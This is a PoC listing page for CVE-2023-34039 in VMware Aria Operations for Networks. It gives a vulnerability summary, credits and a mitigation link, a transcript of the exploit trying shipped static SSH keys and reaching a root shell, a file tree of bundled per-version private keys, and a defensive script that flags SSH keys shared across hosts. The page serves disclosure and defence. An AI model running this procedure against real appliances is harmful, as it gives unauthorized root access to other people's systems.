CVE-2023-34039 PoC: VMware Aria Operations cryptographic issue vulnerability

Source
Associated Vulnerability
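Title: VMware Aria Operations cryptographic issue vulnerability (CVE-2023-34039)
Description: VMware Aria Operations is a unified, AI-driven, self-driving IT operations management platform from the US company VMware, for private cloud, hybrid cloud and multi-cloud environments. Aria Operations for Networks contains a security vulnerability that stems from a lack of unique cryptographic key generation and leads to an authentication bypass. An attacker can exploit it to bypass SSH authentication and access the Aria Operations for Networks CLI.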
Description
CVE-2023-34039
Readme
# CVE-2023-34039
PoC for CVE-2023-34039: VMware Aria Operations for Networks (vRealize Network Insight) static SSH key RCE

## Technical Analysis
A root cause analysis of the vulnerability can be found on my blog:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

![poc](poc.gif)


## Summary
VMware Aria Operations for Networks (vRealize Network Insight) versions 6.0 to 6.10 did not regenerate the SSH keys for the `support` and `ubuntu` users, allowing an attacker with SSH access to gain `root` shell access to this product.

This issue was reported to VMware by [Harsh Jaiswal (@rootxharsh)](https://twitter.com/rootxharsh) and [Rahul Maini (@iamnoooob)](https://twitter.com/iamnoooob) at [ProjectDiscovery Research](https://twitter.com/pdiscoveryio).

I just wrote the exploit, if you can call it that, 'cause it's basically an SSH command wrapper.

## Usage
```plaintext
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

```

## Mitigations
Update to the latest version, or mitigate by following the instructions in the VMware advisory:
* https://www.vmware.com/security/advisories/VMSA-2023-0018.html
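
The root cause in the Summary is that installs share SSH keys instead of generating their own. As an added example (not part of the original PoC or of VMware's tooling), the following audit fingerprints the `authorized_keys` entries collected from several appliances and reports any key trusted on more than one host. The host names, key blobs and the `inventory` layout are constructed assumptions.

```python
import base64
import hashlib
from collections import defaultdict

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-")

def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    """Yield the fingerprint of each key line, skipping comments and options."""
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, field in enumerate(fields[:-1]):
            if field.startswith(KEY_TYPES):
                try:
                    yield fingerprint(fields[i + 1])
                except ValueError:  # malformed base64: ignore the line
                    pass
                break

def shared_keys(inventory):
    """Map fingerprint -> [(host, user)] for keys trusted on more than one host."""
    seen = defaultdict(set)
    for host, users in inventory.items():
        for user, text in users.items():
            for fp in parse_authorized_keys(text):
                seen[fp].add((host, user))
    return {fp: sorted(locs) for fp, locs in seen.items()
            if len({host for host, _ in locs}) > 1}

def sample_blob(seed):
    """Constructed stand-in for a public key blob (not a real key)."""
    return base64.b64encode(seed.encode()).decode()

# Constructed inventory: hypothetical hosts -> user -> authorized_keys text.
SAMPLE = {
    "vrni-a": {"support": f"ssh-rsa {sample_blob('shipped-key')} support@build\n",
               "ubuntu": "# constructed\n" f'no-pty,command="/bin/true" ssh-rsa {sample_blob("shipped-key")} x\n'},
    "vrni-b": {"support": f"ssh-rsa {sample_blob('shipped-key')} support@build\n"},
    "vrni-c": {"support": f"ssh-rsa {sample_blob('regenerated-c')} support@vrni-c\n"},
}

if __name__ == "__main__":
    for fp, locations in shared_keys(SAMPLE).items():
        print(fp, locations)
```

The fingerprints use the same SHA256 format that `ssh-keygen -lf` prints, so a hit can be cross-checked by hand on the appliance.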

File Snapshot

```plaintext
[4.0K] /data/pocs/3d3fa81fff7a44cb1d4f73c2e54bd3fe2d1016e1
├── [1.6K] CVE-2023-34039.py
├── [4.0K] keys
│   ├── [4.0K] vrni-6.0.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.0.0_platform
│   │   └── [1.6K] id_rsa_vnera_keypair_6.0.0_proxy
│   ├── [4.0K] vrni-6.1.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.1.0_platform
│   │   └── [1.6K] id_rsa_vnera_keypair_6.1.0_proxy
│   ├── [4.0K] vrni-6.10.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.10.0_collector
│   │   └── [1.6K] id_rsa_vnera_keypair_6.10.0_platform
│   ├── [4.0K] vrni-6.2.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.2.0_collector
│   │   └── [1.6K] id_rsa_vnera_keypair_6.2.0_platform
│   ├── [4.0K] vrni-6.3.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.3.0_collector
│   │   └── [1.6K] id_rsa_vnera_keypair_6.3.0_platform
│   ├── [4.0K] vrni-6.4.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.4.0_collector
│   │   └── [1.6K] id_rsa_vnera_keypair_6.4.0_platform
│   ├── [4.0K] vrni-6.5.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.5.0_collector
│   │   └── [1.6K] id_rsa_vnera_keypair_6.5.0_platform
│   ├── [4.0K] vrni-6.6.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.6.0_collector
│   │   └── [1.6K] id_rsa_vnera_keypair_6.6.0_platform
│   ├── [4.0K] vrni-6.7.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.7.0_collector
│   │   └── [1.6K] id_rsa_vnera_keypair_6.7.0_platform
│   ├── [4.0K] vrni-6.8.0
│   │   ├── [1.6K] id_rsa_vnera_keypair_6.8.0_collector
│   │   └── [1.6K] id_rsa_vnera_keypair_6.8.0_platform
│   └── [4.0K] vrni-6.9.0
│       ├── [1.6K] id_rsa_vnera_keypair_6.9.0_collector
│       └── [1.6K] id_rsa_vnera_keypair_6.9.0_platform
├── [ 98K] poc.gif
└── [2.2K] README.md

12 directories, 25 files
```